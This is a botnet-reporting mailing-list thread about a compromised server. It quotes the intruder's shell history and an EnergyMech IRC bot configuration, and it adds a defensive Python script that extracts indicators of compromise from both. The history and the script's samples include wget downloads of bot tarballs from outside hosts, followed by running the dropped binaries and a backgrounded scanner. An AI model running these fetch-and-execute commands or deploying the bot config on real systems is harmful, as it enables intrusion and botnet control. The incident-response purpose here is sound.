To report a botnet PRIVATELY please email: [EMAIL PROTECTED] ----------
How did they get in?
Regards,
Adriel T. Desautels
Chief Technology Officer
Netragard, LLC.
Office : 617-934-0269
Mobile : 617-633-3821
http://www.linkedin.com/pub/1/118/a45
---------------------------------------------------------------
Netragard, LLC - http://www.netragard.com - "We make IT Safe"
Penetration Testing, Vulnerability Assessments, Website Security

bodik wrote:
> To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
> ----------
> Hi,
>
> We've found one instance of a bot from someone called Drow (tools were
> compiled but not stripped somewhere in /home/drow ... ;))). Probably a
> Spanish-speaking person.
>
> Undernet admins should take a look down below and check their servers,
> if they are listening here ..
>
> Access was gained by a very, very weak password, and then the standard
> procedure: download bot, SSH cracker, spam tool ...
>
> Was a kiddie, came from 89.123.217.233, with no cleanup and probably
> a manual job ..
>
> ---- cut history ----
> passwd
> ps x
> cd /tmp
> w
> ps x
> cd /tmp
> wget freewebs.com/staycu/stayku.tar
> tar xzvf stayku.tar
> cd .staycu
> ./linux
> cat /proc/cpuinfo
> cd /var/tmp/delles
> cd /var/tmp
> wget http://www.geocities.com/demonfire_16/delles.tar.gz
> tar xzvf delles.tar.gz
> cd delles
> ./a 200.62
> nohup ./start 59 >> /dev/null &
> cd /var/tmp/delles
> cat vuln.txt
> ps x
> cd /var/tmp/delles
> cat vuln.txt
> ps x
> cd /var/tmp/delles
> cat vuln.txt
> ...
> ...
> ---- cut history ----
>
> bodik
>
> ---- cut ----
>
> # Boqdan`S EnergyMech configuration file
> # v2.9.3 - Boqdan
>
> ##### Linking #####
> #ENTITY emech
> #LINKPASS abc123
> #LINKPORT 49152
> #LINK hismech a1b2c3 mech.host.net 49152
> #LINK hermech abcdefg 0 0
> AUTOLINK
>
> ##### Server List ####
> SERVER diemen.nl.eu.undernet.org 6660
> SERVER diemen.nl.eu.undernet.org 6667
> SERVER diemen.nl.eu.undernet.org 6669
> SERVER lelystad.nl.eu.undernet.org 6666
> SERVER lelystad.nl.eu.undernet.org 6667
> SERVER lelystad.nl.eu.undernet.org 6668
> SERVER london2.uk.eu.undernet.org 6660
> SERVER london2.uk.eu.undernet.org 6669
> SERVER london2.uk.eu.undernet.org 7000
> SERVER graz.at.eu.undernet.org 6660
> SERVER graz.at.eu.undernet.org 6670
> SERVER graz.at.eu.undernet.org 7000
> SERVER helsinki.fi.eu.undernet.org 6666
> SERVER helsinki.fi.eu.undernet.org 6669
> SERVER helsinki.fi.eu.undernet.org 7000
> SERVER montreal.qc.ca.undernet.org 6665
> SERVER montreal.qc.ca.undernet.rog 6669
> SERVER montreal.qc.ca.undernet.org 7000
> SERVER oslo2.no.eu.undernet.org 6660
> SERVER oslo2.no.eu.undernet.org 6669
> SERVER oslo2.no.eu.undernet.org 7000
>
> # SERVER 1.2.3.4 6667 ThisIsMyPassword
> # SERVER 192.168.100.1 6669 moo:eu.undernet.org:6667
>
> ##### Bot 1 Configuration #####
> NICK Boqdan
> USERFILE 1
> CMDCHAR -
> LOGIN gat
> IRCNAME tundd
> MODES +ix-ws
> #VIRTUAL
> #NOSEEN
>
> HASONOTICE 1    # Yes for Undernet.
> TOG CC 1        # We want the bot to require command character
> TOG CLOAK 1     # Ignore CTCP's from non-users? Yes.
> TOG SPY 1       # Tell who is executing what in the partyline.
> SET OPMODES 6   # How many modes in a line? 6 on undernet...
> SET BANMODES 6  # How many bans in a line? 6 on undernet...
> SET CTIMEOUT 60 # Server connection timeout
> SET CDELAY 30   # Delay between connection attempts
>
> CHANNEL #staycu.com # Channel name
> TOG PUB 1       # Allow public(in-channel) commands? Yes.
> TOG MASS 1      # Do mass-mode/kick/ban checks...
> TOG SHIT 1      # Activate the shitlist for this channel
> TOG PROT 1      # Activate protection of users
> TOG ENFM 0      # Dont enforce channel modes.
> SET MDL 5       # How many -o before killing the guy?
> SET MKL 5       # How many kicks?
> SET MBL 5       # And how many Bans?
> SET MPL 1       # What to do with massmoders?
>                 # 0 = nothing,
>                 # 1 = kick the bastard,
>                 # 2 = kickban 'em,
>                 # 3 = kickban & shitlist them.
> ##### END BOT 1 #####
>
> ##### Bot 2 Configuration #####
>
> NICK Guapo
> USERFILE 1
> CMDCHAR -
> LOGIN lmess
> IRCNAME mesaju
> MODES +ix-ws
> #VIRtual
> #NOSEEN
>
> HASONOTICE 1    # Yes for Undernet.
> TOG CC 1        # We want the bot to require command character
> TOG CLOAK 1     # Ignore CTCP's from non-users? Yes.
> TOG SPY 1       # Tell who is executing what in the partyline.
> SET OPMODES 6   # How many modes in a line? 6 on undernet...
> SET BANMODES 6  # How many bans in a line? 6 on undernet...
> SET CTIMEOUT 60 # Server connection timeout
> SET CDELAY 30   # Delay between connection attempts
>
> CHANNEL #staycu.com # Channel name
> TOG PUB 1       # Allow public(in-channel) commands? Yes.
> TOG MASS 1      # Do mass-mode/kick/ban checks...
> TOG SHIT 1      # Activate the shitlist for this channel
> TOG PROT 1      # Activate protection of users
> TOG ENFM 0      # Dont enforce channel modes.
> SET MDL 5       # How many -o before killing the guy?
> SET MKL 5       # How many kicks?
> SET MBL 5       # And how many Bans?
> SET MPL 1       # What to do with massmoders?
>                 # 0 = nothing,
>                 # 1 = kick the bastard,
>                 # 2 = kickban 'em,
>                 # 3 = kickban & shitlist them.
> ##### END BOT 2 #####
>
> ##### Bot 3 Configuration #####
>
> NICK Bogdy
> USERFILE 1
> CMDCHAR -
> LOGIN Lucru
> IRCNAME LeLa
> MODES +ix-ws
> #VIRTUAL
> #NOSEEN
>
> HASONOTICE 1    # Yes for Undernet.
> TOG CC 1        # We want the bot to require command character
> TOG CLOAK 1     # Ignore CTCP's from non-users? Yes.
> TOG SPY 1       # Tell who is executing what in the partyline.
> SET OPMODES 6   # How many modes in a line? 6 on undernet...
> SET BANMODES 6  # How many bans in a line? 6 on undernet...
> SET CTIMEOUT 60 # Server connection timeout
> SET CDELAY 30   # Delay between connection attempts
>
> CHANNEL #staycu.com # Channel name
> TOG PUB 1       # Allow public(in-channel) commands? Yes.
> TOG MASS 1      # Do mass-mode/kick/ban checks...
> TOG SHIT 1      # Activate the shitlist for this channel
> TOG PROT 1      # Activate protection of users
> TOG ENFM 0      # Dont enforce channel modes.
> SET MDL 5       # How many -o before killing the guy?
> SET MKL 5       # How many kicks?
> SET MBL 5       # And how many Bans?
> SET MPL 1       # What to do with massmoders?
>                 # 0 = nothing,
>                 # 1 = kick the bastard,
>                 # 2 = kickban 'em,
>                 # 3 = kickban & shitlist them.
> ##### END BOT 3 #####
> ---- cut ----
> _______________________________________________
> To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
> All list and server information are public and available to law enforcement
> upon request.
> http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
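Added example, not part of the original thread or of bodik's tooling: a small Python triage helper that does the two checks the report asks for. It walks a recovered shell history like the one quoted above (tracking the working directory so relative `cd` targets resolve to the absolute staging path) and pulls out download URLs, staging directories under world-writable trees, launched binaries and anything left running with `&`; and it parses an EnergyMech config to list the IRC servers, nicks and channels so Undernet admins can check their servers. The sample history and config are constructed excerpts shaped like the quoted ones, and the `.undernet.org` suffix used to flag mistyped hosts is an assumption for the example.

```python
"""Triage helper: indicators from a shell history and an EnergyMech config.
The two SAMPLE_* strings are constructed excerpts shaped like the quoted post."""
import posixpath
from dataclasses import dataclass, field

SAMPLE_HISTORY = """\
passwd
cd /tmp
wget freewebs.com/staycu/stayku.tar
tar xzvf stayku.tar
cd .staycu
./linux
cd /var/tmp
wget http://www.geocities.com/demonfire_16/delles.tar.gz
tar xzvf delles.tar.gz
cd delles
./a 200.62
nohup ./start 59 >> /dev/null &
"""

SAMPLE_MECH_CONF = """\
# Boqdan`S EnergyMech configuration file
SERVER diemen.nl.eu.undernet.org 6667
SERVER montreal.qc.ca.undernet.rog 6669
# SERVER 1.2.3.4 6667 ThisIsMyPassword
NICK Boqdan
LOGIN gat
CHANNEL #staycu.com # Channel name
NICK Guapo
CHANNEL #staycu.com # Channel name
"""

STAGING_ROOTS = ("/tmp", "/var/tmp", "/dev/shm")  # world-writable drop dirs
SHELL_CONTROL = {">", ">>", "<", "&", "&&", "|", "||", ";", "2>", "2>&1"}


@dataclass
class HistoryIOCs:
    urls: list = field(default_factory=list)          # what was fetched
    staging_dirs: list = field(default_factory=list)  # where it was unpacked/run
    executed: list = field(default_factory=list)      # (cwd, program, args)
    background: list = field(default_factory=list)    # lines left running with '&'


def history_indicators(history: str, start_dir: str = "~") -> HistoryIOCs:
    """One pass over the history, tracking cwd so 'cd delles' resolves to
    '/var/tmp/delles'. The login directory is not recorded, so cwd starts as '~'."""
    iocs, cwd = HistoryIOCs(), start_dir
    for raw in history.splitlines():
        toks = raw.split()
        if not toks:
            continue
        background = toks[-1] == "&"
        if toks[0] == "nohup":           # 'nohup prog ...' runs prog; drop the wrapper
            toks = toks[1:]
        cmd, args = toks[0], []
        for t in toks[1:]:               # arguments stop at the first redirect/control token
            if t in SHELL_CONTROL:
                break
            args.append(t)
        if cmd == "cd" and args:
            target = args[0]
            cwd = posixpath.normpath(target if target.startswith("/")
                                     else posixpath.join(cwd, target))
            in_staging = any(cwd == r or cwd.startswith(r + "/") for r in STAGING_ROOTS)
            if in_staging and cwd not in iocs.staging_dirs:
                iocs.staging_dirs.append(cwd)
        elif cmd in ("wget", "curl"):    # first non-option argument is the URL
            url = next((a for a in args if not a.startswith("-")), None)
            if url:
                iocs.urls.append(url)
        elif cmd.startswith("./"):       # a dropped binary being launched
            iocs.executed.append((cwd, cmd, args))
        if background:
            iocs.background.append(raw.strip())
    return iocs


@dataclass
class MechIOCs:
    servers: list = field(default_factory=list)   # (host, port), unique, file order
    nicks: list = field(default_factory=list)
    channels: list = field(default_factory=list)


def mech_indicators(conf: str) -> MechIOCs:
    """Parse 'KEY value ... # comment' lines. Whole-line '#' comments are skipped
    (a commented-out SERVER is not a live C2), but a '#' directly after CHANNEL
    is the channel name, not a comment."""
    m = MechIOCs()
    for raw in conf.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        toks = line.split()
        key, vals = toks[0].upper(), []
        for i, t in enumerate(toks[1:]):
            if t.startswith("#") and not (key == "CHANNEL" and i == 0):
                break
            vals.append(t)
        if key == "SERVER" and len(vals) >= 2 and vals[1].isdigit():
            entry = (vals[0].lower(), int(vals[1]))
            if entry not in m.servers:
                m.servers.append(entry)
        elif key == "NICK" and vals:
            m.nicks.append(vals[0])
        elif key == "CHANNEL" and vals and vals[0] not in m.channels:
            m.channels.append(vals[0])
    return m


def hosts_not_under(m: MechIOCs, suffix: str) -> list:
    """Servers outside the expected network domain (assumed suffix such as
    '.undernet.org'): a typo the bot can never reach, or a foreign server."""
    return sorted({h for h, _ in m.servers if not h.endswith(suffix)})


if __name__ == "__main__":
    h, m = history_indicators(SAMPLE_HISTORY), mech_indicators(SAMPLE_MECH_CONF)
    print(h, m, hosts_not_under(m, ".undernet.org"), sep="\n")
```

Run against a real history, feed the `servers` list to the network's admins and the `urls` list to whoever hosts the payloads; `hosts_not_under` is what catches the `undernet.rog` entry in the quoted config, which the bot can never connect to and which is therefore not a server anyone needs to check.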